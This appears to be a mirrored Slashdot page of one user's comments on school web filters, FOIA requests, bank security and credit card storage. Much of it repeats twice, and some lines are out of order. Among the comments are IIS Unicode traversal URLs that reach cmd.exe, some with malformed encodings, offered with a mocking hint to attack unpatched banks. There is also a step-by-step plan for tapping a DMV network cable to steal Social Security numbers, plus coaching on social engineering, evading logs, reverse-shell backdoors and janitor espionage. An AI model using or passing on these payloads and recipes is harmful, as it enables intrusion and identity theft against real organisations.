It isn't about filtering porn. It is more about the ability to view other websites. Many MANY MANY websites are miscategorized and blocked. MANY.
And MANY MANY MANY porn sites are not blocked, in fact its VERY easy to find porn sites that are not filtered if you know what you are doing.
Plus now N2H2 is selling information about viewing habits of children at school, when they are forced to utilize the BESS proxy by the damn stupid government here in the United States. Sadly there is too much money being slipped under the table for votes on certain issues....
N2H2's setup is more than just blocking porn, it often blocks my access to highly informational sites about C coding and even blocks stuff on gnu.org... which definately isnt porn or an online store.
Sorry, but you need to wake up and realize that it isn't all about some horny kid wanting to view porn in public.
You can gain access to this same information by utilizing the Freedom of Info act, since schools are operated by the Federal Govt.
Below is a letter I recently sent to my school district in Las Vegas, NV:
Freedom of Information Officer
Network Services
Clark County School District
2832 E Flamingo Rd.
Las Vegas, NV 89121
Re: Freedom of Information Act Request
Dear officer:
Under the Freedom of Information Act (5 U.S.C. 552) I would like to request the following materials from the Clark County School District (CCSD):
1) All documentation regarding the implementation of the Bess web proxy system provided to CCSD by N2H2. Including proxy configuration, network topology after installation, and the reasons for the Bess installation.
2) All access logs that are recorded by the Bess proxy filter. These logs should be provided in digital form, compressed using either ZIP or gzip compression algorithms.
3) Documentation regarding the effectiveness of Bess at blocking Internet sites deemed inappropriate for minors and sites that have been mis-categorized by Bess.
I am aware that I am entitled to make this request under the Freedom of Information Act, and if your agency response is not satisfactory, I am prepared to make an administrative appeal. Please indicate to me the name of the official to whom such an appeal should be addressed.
If my request is denied, I am entitled to know the reasons for denial.
I am aware that while the law allows your agency to withhold specified categories of exempted information, you are required by law to release any segregable portions that are left after the exempted material has been deleted from the data I am seeking.
I also request a waiver of all fees for this request. Disclosure of the requested information to me is in the public interest because it is likely to contribute significantly to public understanding of the operations or activities of the government, and is not in my commercial interest. I am classified as noncommercial news media under the Freedom of Information Act.
Sincerely,
xxx
Anyways, they responded back by sending me marketting materials from N2H2. Well, its time to re-request the information and "be more specific."
Anyways, this does work well for pissing them off and scaring them to death, plus you can see how ineffective the filters really are.
Govt has no right in censorship of its people. The US Govt should not have the authority to deem what material is appropriate for it's people. That is one of the freedoms here in the United States. We do not live in China where the govt dictates our lives. If a legal adult is at a library looking at inappropriate material or reading "questionable" materials, that is his/her choice... the Govt has no rule on what is appropriate or not for it's legal adult citizens.
What about Gary's pussy shirt?
on
Antitrust
·
· Score: 1
He had a jacket on over the gray shirt, it reads "pussy"
woah, a true hax0r there! I can hear his GF now:
"mount me baby!; fsck/dev/pussy; echo.*.*O/dev/pussy; umount me baby!"
Lets get some backbone providers to cooperate and track the true origins of the attacks (they probably spoof). Once we get the true origins, post the IP#s of systems on those networks to slashdot and we will give them the/. effect... times two:)
This does not make Jeff look like a criminal. The truth is that ANYBODY can find out that information, any employee, any customer. Want to verify that statement? Call their customer service and ask questions about their database and servers (ever hear of social engineering?).... don't ask directly, make them want to tell you the information you want.
Believe me, ANYBODY can get that information... fortunately Jeff is willing to speak out about it so that the general public can know the facts, instead of what some PR person tells the press.
But why have they not contacted me? Email is an EASY way to contact customers, yet they haven't.
They keep your CC# on file indefinately, even if you have your account suspended. I honestly don't know why they keep your CC# in the databases?
This is always the problem with all these sites that a broken into.
Plus, for pete's sake.... deny (YES DENY) all select requests on the tables that contain cc#s... if your database can't deny SELECTs then you need a new DB server!
Fortunately Carnivore does help to lead investigators to people committing crimes by keeping logs of certain users/data. This is a Good Thing (tm) if the Carnivore beast does not log innocent civilian data.
I believe (and would hope) that the FBI should still be required to go through the courts before actually logging any data.
But I definately believe that this was NOT a violation of anyone's rights, so why was it included in the "Your Rights Online" section ?
This is a letter I wrote today to my local school district regarding their use of the Bess Internet filter (mentioned on other/. stories).
---
Freedom of Information Officer
Network Services
Clark County School District
2832 E Flamingo Rd.
Las Vegas, NV 89121
Re: Freedom of Information Act Request
Dear officer:
Under the Freedom of Information Act (5 U.S.C. 552) I would like to request the following materials from the Clark County School District (CCSD):
1) All documentation regarding the implementation of the Bess web proxy system provided to CCSD by N2H2. Including proxy configuration, network topology after installation, and the reasons for the Bess installation.
2) All access logs that are recorded by the Bess proxy filter. These logs should be provided in digital form, compressed using either ZIP or gzip compression algorithms.
3) Documentation regarding the effectiveness of Bess at blocking Internet sites deemed inappropriate for minors and sites that have been mis-categorized by Bess.
I am aware that I am entitled to make this request under the Freedom of Information Act, and if your agency response is not satisfactory, I am prepared to make an administrative appeal. Please indicate to me the name of the official to whom such an appeal should be addressed.
If my request is denied, I am entitled to know the reasons for denial.
I am aware that while the law allows your agency to withhold specified categories of exempted information, you are required by law to release any segregable portions that are left after the exempted material has been deleted from the data I am seeking.
I also request a waiver of all fees for this request. Disclosure of the requested information to me is in the public interest because it is likely to contribute significantly to public understanding of the operations or activities of the government, and is not in my commercial interest. I am classified as noncommercial news media under the Freedom of Information Act.
I personally have experience with a few online banks and I have only looked at Bank One once or twice and only for a few brief moments.... but if you really look deep into bank security you will find issues, for example:
Last year I "owned" a bank in Florida (that will go un-named) through some pretty well documented issues and the lack of patching on certain servers. Their servers were not only insecure, but the software running on them was insecure. Upon reporting the issues directly to the bank's ceo via phone and then faxing documentation to their offices, they never once contacted me to thank me. I documented ONLY one security issue and how to fix it, but I said there were _many_ more issues and that they needed a security audit.
Even to this day, they only fixed the one issue... I've documented my side in writing... It's their problem if they get hacked and someone starts stealing money from their database... Anyways, my point is that even though I detailed issues in both technical and non-technical forms.... they still did not care too much about security... Does it really take an "evil malicious cyber criminal" to wake a bank up ???
Another issue was this recent IIS Unicode decoding issue that allows escaping of the web root onto the physical hard drive root. Major issue... many banks still exhibit the bug and I've even noticed that some banks exhibiting the but on their financial servers that talk with their databases even have full C: drives... where IIS usually stores logs. So guess what? I am not logged if I go exploit a server where it's Web-logging drive (default win nt install is C:) is full... how convenient!
I am not a "security expert" by any means, I am more a security enthusiast. Even I have been able to see MAJOR issues with banks being online. I will _NOT_ trust any of the banks that I have visited online yet.... there are just too many damn security issues involved.
Most banks don't even use IPSEC inside their firewall, another MAJOR issue.... Some banks run Win9x terminals, install a keylogger and log their whole damn telnet session to their server... damn you must be an EVIL MALICIOUS HACKER!
We as humanity are losing trustworthiness, which in return makes cryptography an everyday necessity. Humanity is evolving, we are growing more and more controlled by wealth and money, instead of human life. We now need cryptography and we have not scratched the surface of what it will become.
Maybe so, but maybe the reason for this "losing of trustworthiness" is due to our increasing reliance on encryption. I believe that our world will become more like a "better for humanity" instead of "better for me and my wealth" within the next 50 years... after of course the American economy collapses because some _smart_ hacker destroys the stock market.
Believe it or not, America will be a better place without an money being exchanged as it is now. But this process won't happen until technology relieves many people of work such as flipping burgers at mcdonalds.... When technology can repair itself and live as a "being" then humanity will be ready to explore the universe and sciences instead of yelling and screaming "I want more money."
One day, I am betting that there will be a geek rebellion in the world. Us computer geeks run more than 90% of the commerce in the United States in some way or another.
If all geeks took just ONE holiday, the nation would be in chaos. Those sheep need nerds... without nerds, they wouldn't be able to access their favorite porn site or download a 50 meg sex video.
Seriously, if politics continue on the path they are on, we may just have a geek rebellion on our hands. Can you imagine an army of geeks that all "love Big Brother" and memorize lines from 1984?
War is peace
Freedom is Slavery
Ignorance is Strenth
If in prison, you can still gain access to technology through means that most guards would never be able to detect. Hell, I bet minimum and medium security prisons allow you to play with radios and calculators...
Now, can you imagine Linus being sent to prison for "hacking" and then programming a new linux kernel for TI graphing calculators.
I am very interested in this topic. Utilizing almost any underground activities to gain access to information at another company.
Your government spies on other countries... It is my opinion that a corporation is just a smaller government body... I don't see too major of a problem.
Work as a janitor, gain access to lots of information at a ton of companies. Most companies, even ones with "good" security, do not think that their cleaning crews have the slightest clue what pgp, ssl, blowfish, and ssh are.
Does anyone know where to find information about gaining a career in this area... As a freelancer of course:)
Actually a few laptops have been recovered this way through the distributed.net client... which can run silently in the background.
It reports back to servers throughout the world on a regular basis.... without user interaction (normally).
Another way, is place a "backdoor" that uses STRONG encryption, and connects to a remote server (at your company). Like sshd... only REVERSED... sshd that establishes a connection to the outside system... allowing that outside system to gain shell access. (I saw something like this on the _new_ packetstorm recently)
Good luck on recovery.... Usually doing a "backdoor" is better, cause you can login and move information from your stolen system back inside your network.... and then trash the laptop (and then pursue the criminal).
Sadly they block even many GNU projects. This is not fun and games anymore.... luckily I found a GOOD solid way to bypass bess. I fear documenting it, since it may lead to a fix. So I just won't.... but there are ways around bess's filtering mechanisms.
Afraid of security ? All those Win9x machines that are not able to cope with one linux box that is able to spoof a server, undetected?
Linux is nothing to fear, IF the user that uses it knows what he/she is doing and can handle the system efficiently and still uses the network's file system to store work on. (For central location and backup reasons)
Is there any objections to actually implementing linux for the users that know what they are doing?
I must agree on this topic, I hope it is included in the questions list. This sums up a majority of the questions, plus we will not receive any BS answer if they do not explain their reasoning.
Slashdot isnt about promoting Linux above other platforms, instead it is about posting news, rumors, and "Ask Slashdot".... its about being open to new ideas.
Linux isnt the best OS, nor is Windows, nor Solaris, Irix, QNX, BSD.... etc.... there is no perfect OS.
Harm caused by slashdot is well deserved as it is just bringing to light news/events/ideas that interest geeks. That is why the slashdot pages always say "News for Nerds. Stuff that matters". It really does matter.
no. These systems are NOT decoys, they are active systems connected to the Internet in some form or another. Many of them can be quite critical to security.
I have followed different "hackers" (to me, hackers also means hella good coders, not just security experts) through Air traffic control systems and DoD weapons inventory systems. Believe it or not, many are vulnerable. And they are LIVE systems.
Why not insert the CC#s into a "NO-SELECT" privileges table (encrypted of course, both at record level and at filesystem level)? Then grant select to a different user (that is denied login from non-priveged IP#s).
Simple solution for many online stores, yet it is NEVER done (at least that I have seen), except for on my own store that I am coding.
So now, you have 3 levels of security on top of the normal database server, firewall, etc.
Then follow a new standard procedure of deleting credit card #s after billing and possibly replacing the field with only the last 4 digits or an MD5 so that you can verify it later.
Common sense, but nobody seems to want to follow it.
Slashdot Mirror
It isn't about filtering porn. It is more about the ability to view other websites. Many MANY MANY websites are miscategorized and blocked. MANY.
And MANY MANY MANY porn sites are not blocked, in fact its VERY easy to find porn sites that are not filtered if you know what you are doing.
Plus now N2H2 is selling information about viewing habits of children at school, when they are forced to utilize the BESS proxy by the damn stupid government here in the United States. Sadly there is too much money being slipped under the table for votes on certain issues....
N2H2's setup is more than just blocking porn, it often blocks my access to highly informational sites about C coding and even blocks stuff on gnu.org... which definately isnt porn or an online store.
Sorry, but you need to wake up and realize that it isn't all about some horny kid wanting to view porn in public.
Damn.
You can gain access to this same information by utilizing the Freedom of Info act, since schools are operated by the Federal Govt.
Below is a letter I recently sent to my school district in Las Vegas, NV:
Freedom of Information Officer
Network Services
Clark County School District
2832 E Flamingo Rd.
Las Vegas, NV 89121
Re: Freedom of Information Act Request
Dear officer:
Under the Freedom of Information Act (5 U.S.C. 552) I would like to request the following materials from the Clark County School District (CCSD):
1) All documentation regarding the implementation of the Bess web proxy system provided to CCSD by N2H2. Including proxy configuration, network topology after installation, and the reasons for the Bess installation.
2) All access logs that are recorded by the Bess proxy filter. These logs should be provided in digital form, compressed using either ZIP or gzip compression algorithms.
3) Documentation regarding the effectiveness of Bess at blocking Internet sites deemed inappropriate for minors and sites that have been mis-categorized by Bess.
I am aware that I am entitled to make this request under the Freedom of Information Act, and if your agency response is not satisfactory, I am prepared to make an administrative appeal. Please indicate to me the name of the official to whom such an appeal should be addressed.
If my request is denied, I am entitled to know the reasons for denial.
I am aware that while the law allows your agency to withhold specified categories of exempted information, you are required by law to release any segregable portions that are left after the exempted material has been deleted from the data I am seeking.
I also request a waiver of all fees for this request. Disclosure of the requested information to me is in the public interest because it is likely to contribute significantly to public understanding of the operations or activities of the government, and is not in my commercial interest. I am classified as noncommercial news media under the Freedom of Information Act.
Sincerely,
xxx
Anyways, they responded back by sending me marketting materials from N2H2. Well, its time to re-request the information and "be more specific."
Anyways, this does work well for pissing them off and scaring them to death, plus you can see how ineffective the filters really are.
x
Besides filters not working.
Govt has no right in censorship of its people. The US Govt should not have the authority to deem what material is appropriate for it's people. That is one of the freedoms here in the United States. We do not live in China where the govt dictates our lives. If a legal adult is at a library looking at inappropriate material or reading "questionable" materials, that is his/her choice... the Govt has no rule on what is appropriate or not for it's legal adult citizens.
He had a jacket on over the gray shirt, it reads "pussy"
/dev/pussy; echo .*.*O /dev/pussy; umount me baby!"
woah, a true hax0r there! I can hear his GF now:
"mount me baby!; fsck
Lets get some backbone providers to cooperate and track the true origins of the attacks (they probably spoof). Once we get the true origins, post the IP#s of systems on those networks to slashdot and we will give them the /. effect ... times two :)
This does not make Jeff look like a criminal. The truth is that ANYBODY can find out that information, any employee, any customer. Want to verify that statement? Call their customer service and ask questions about their database and servers (ever hear of social engineering?) .... don't ask directly, make them want to tell you the information you want.
Believe me, ANYBODY can get that information... fortunately Jeff is willing to speak out about it so that the general public can know the facts, instead of what some PR person tells the press.
Nice work Jeff, I support you totally.
But why have they not contacted me? Email is an EASY way to contact customers, yet they haven't.
They keep your CC# on file indefinately, even if you have your account suspended. I honestly don't know why they keep your CC# in the databases?
This is always the problem with all these sites that a broken into.
Plus, for pete's sake.... deny (YES DENY) all select requests on the tables that contain cc#s... if your database can't deny SELECTs then you need a new DB server!
Fortunately Carnivore does help to lead investigators to people committing crimes by keeping logs of certain users/data. This is a Good Thing (tm) if the Carnivore beast does not log innocent civilian data.
I believe (and would hope) that the FBI should still be required to go through the courts before actually logging any data.
But I definately believe that this was NOT a violation of anyone's rights, so why was it included in the "Your Rights Online" section ?
This is a letter I wrote today to my local school district regarding their use of the Bess Internet filter (mentioned on other /. stories).
---
Freedom of Information Officer
Network Services
Clark County School District
2832 E Flamingo Rd.
Las Vegas, NV 89121
Re: Freedom of Information Act Request
Dear officer:
Under the Freedom of Information Act (5 U.S.C. 552) I would like to request the following materials from the Clark County School District (CCSD):
1) All documentation regarding the implementation of the Bess web proxy system provided to CCSD by N2H2. Including proxy configuration, network topology after installation, and the reasons for the Bess installation.
2) All access logs that are recorded by the Bess proxy filter. These logs should be provided in digital form, compressed using either ZIP or gzip compression algorithms.
3) Documentation regarding the effectiveness of Bess at blocking Internet sites deemed inappropriate for minors and sites that have been mis-categorized by Bess.
I am aware that I am entitled to make this request under the Freedom of Information Act, and if your agency response is not satisfactory, I am prepared to make an administrative appeal. Please indicate to me the name of the official to whom such an appeal should be addressed.
If my request is denied, I am entitled to know the reasons for denial.
I am aware that while the law allows your agency to withhold specified categories of exempted information, you are required by law to release any segregable portions that are left after the exempted material has been deleted from the data I am seeking.
I also request a waiver of all fees for this request. Disclosure of the requested information to me is in the public interest because it is likely to contribute significantly to public understanding of the operations or activities of the government, and is not in my commercial interest. I am classified as noncommercial news media under the Freedom of Information Act.
Sincerely,
[my name / contact information]
I personally have experience with a few online banks and I have only looked at Bank One once or twice and only for a few brief moments.... but if you really look deep into bank security you will find issues, for example:
... damn you must be an EVIL MALICIOUS HACKER!
Last year I "owned" a bank in Florida (that will go un-named) through some pretty well documented issues and the lack of patching on certain servers. Their servers were not only insecure, but the software running on them was insecure. Upon reporting the issues directly to the bank's ceo via phone and then faxing documentation to their offices, they never once contacted me to thank me. I documented ONLY one security issue and how to fix it, but I said there were _many_ more issues and that they needed a security audit.
Even to this day, they only fixed the one issue... I've documented my side in writing... It's their problem if they get hacked and someone starts stealing money from their database... Anyways, my point is that even though I detailed issues in both technical and non-technical forms.... they still did not care too much about security... Does it really take an "evil malicious cyber criminal" to wake a bank up ???
Another issue was this recent IIS Unicode decoding issue that allows escaping of the web root onto the physical hard drive root. Major issue... many banks still exhibit the bug and I've even noticed that some banks exhibiting the but on their financial servers that talk with their databases even have full C: drives... where IIS usually stores logs. So guess what? I am not logged if I go exploit a server where it's Web-logging drive (default win nt install is C:) is full... how convenient!
I am not a "security expert" by any means, I am more a security enthusiast. Even I have been able to see MAJOR issues with banks being online. I will _NOT_ trust any of the banks that I have visited online yet.... there are just too many damn security issues involved.
Most banks don't even use IPSEC inside their firewall, another MAJOR issue.... Some banks run Win9x terminals, install a keylogger and log their whole damn telnet session to their server
We as humanity are losing trustworthiness, which in return makes cryptography an everyday necessity. Humanity is evolving, we are growing more and more controlled by wealth and money, instead of human life. We now need cryptography and we have not scratched the surface of what it will become.
Maybe so, but maybe the reason for this "losing of trustworthiness" is due to our increasing reliance on encryption. I believe that our world will become more like a "better for humanity" instead of "better for me and my wealth" within the next 50 years... after of course the American economy collapses because some _smart_ hacker destroys the stock market. Believe it or not, America will be a better place without an money being exchanged as it is now. But this process won't happen until technology relieves many people of work such as flipping burgers at mcdonalds.... When technology can repair itself and live as a "being" then humanity will be ready to explore the universe and sciences instead of yelling and screaming "I want more money."
I am willing to bet this "hacker" owned egg.microsoft.com, which was not patched. It took them a few days to take it down and it still is offline.
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
He was not a "hacker" he just created one of the unicode urls that got parsed incorrectly by IIS. No skill.
http://target/scripts/..%c1%1c../winnt/system32
http://target/scripts/..%c0%9v../winnt/system32
http://target/scripts/..%c0%af../winnt/system32
http://target/scripts/..%c0%qf../winnt/system32
http://target/scripts/..%c1%8s../winnt/system32
http://target/scripts/..%c1%9c../winnt/system32
http://target/scripts/..%c1%pc../winnt/system32
Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!
One day, I am betting that there will be a geek rebellion in the world. Us computer geeks run more than 90% of the commerce in the United States in some way or another.
If all geeks took just ONE holiday, the nation would be in chaos. Those sheep need nerds... without nerds, they wouldn't be able to access their favorite porn site or download a 50 meg sex video.
Seriously, if politics continue on the path they are on, we may just have a geek rebellion on our hands. Can you imagine an army of geeks that all "love Big Brother" and memorize lines from 1984?
War is peace
Freedom is Slavery
Ignorance is Strenth
Don't forget the most important:
Geeks are gods
If in prison, you can still gain access to technology through means that most guards would never be able to detect. Hell, I bet minimum and medium security prisons allow you to play with radios and calculators...
:)
Now, can you imagine Linus being sent to prison for "hacking" and then programming a new linux kernel for TI graphing calculators.
I bet he could do it
I am very interested in this topic. Utilizing almost any underground activities to gain access to information at another company.
:)
Your government spies on other countries... It is my opinion that a corporation is just a smaller government body... I don't see too major of a problem.
Work as a janitor, gain access to lots of information at a ton of companies. Most companies, even ones with "good" security, do not think that their cleaning crews have the slightest clue what pgp, ssl, blowfish, and ssh are.
Does anyone know where to find information about gaining a career in this area... As a freelancer of course
Actually a few laptops have been recovered this way through the distributed.net client... which can run silently in the background.
It reports back to servers throughout the world on a regular basis.... without user interaction (normally).
Another way, is place a "backdoor" that uses STRONG encryption, and connects to a remote server (at your company). Like sshd... only REVERSED... sshd that establishes a connection to the outside system... allowing that outside system to gain shell access. (I saw something like this on the _new_ packetstorm recently)
Good luck on recovery.... Usually doing a "backdoor" is better, cause you can login and move information from your stolen system back inside your network.... and then trash the laptop (and then pursue the criminal).
Sadly they block even many GNU projects. This is not fun and games anymore.... luckily I found a GOOD solid way to bypass bess. I fear documenting it, since it may lead to a fix. So I just won't.... but there are ways around bess's filtering mechanisms.
Afraid of security ? All those Win9x machines that are not able to cope with one linux box that is able to spoof a server, undetected?
Linux is nothing to fear, IF the user that uses it knows what he/she is doing and can handle the system efficiently and still uses the network's file system to store work on. (For central location and backup reasons)
Is there any objections to actually implementing linux for the users that know what they are doing?
Slashdot Gods:
I must agree on this topic, I hope it is included in the questions list. This sums up a majority of the questions, plus we will not receive any BS answer if they do not explain their reasoning.
Slashdot isnt about promoting Linux above other platforms, instead it is about posting news, rumors, and "Ask Slashdot".... its about being open to new ideas.
Linux isnt the best OS, nor is Windows, nor Solaris, Irix, QNX, BSD.... etc.... there is no perfect OS.
Harm caused by slashdot is well deserved as it is just bringing to light news/events/ideas that interest geeks. That is why the slashdot pages always say "News for Nerds. Stuff that matters". It really does matter.
This is a VERY powerful system imager
http://systemimager.sourceforge.net/
The page says "Now supports: ext2, ext3, reiserfs, use without DHCP, and more!"
Worthwhile guys!
no. These systems are NOT decoys, they are active systems connected to the Internet in some form or another. Many of them can be quite critical to security.
I have followed different "hackers" (to me, hackers also means hella good coders, not just security experts) through Air traffic control systems and DoD weapons inventory systems. Believe it or not, many are vulnerable. And they are LIVE systems.
Walkin.
Find a corner with nobody around.
grab a cat-5, split wires off into a wireless transmitter.
hide cable away under a desk.
park a vehicle in parking lot of building with receiver inside, dumping to a laptop.
steal social security #s (most are unencrypted networks), personal info, address info, drivers license info, etc.
Enjoy. Guarenteed to work at your local DMV!
Why not insert the CC#s into a "NO-SELECT" privileges table (encrypted of course, both at record level and at filesystem level)? Then grant select to a different user (that is denied login from non-priveged IP#s).
Simple solution for many online stores, yet it is NEVER done (at least that I have seen), except for on my own store that I am coding.
So now, you have 3 levels of security on top of the normal database server, firewall, etc.
Then follow a new standard procedure of deleting credit card #s after billing and possibly replacing the field with only the last 4 digits or an MD5 so that you can verify it later.
Common sense, but nobody seems to want to follow it.
a proper request is "GET / HTTP/1.0" or "GET / HTTP/1.1\r\nHost: www.porn_cc_database.com\r\n\r\n"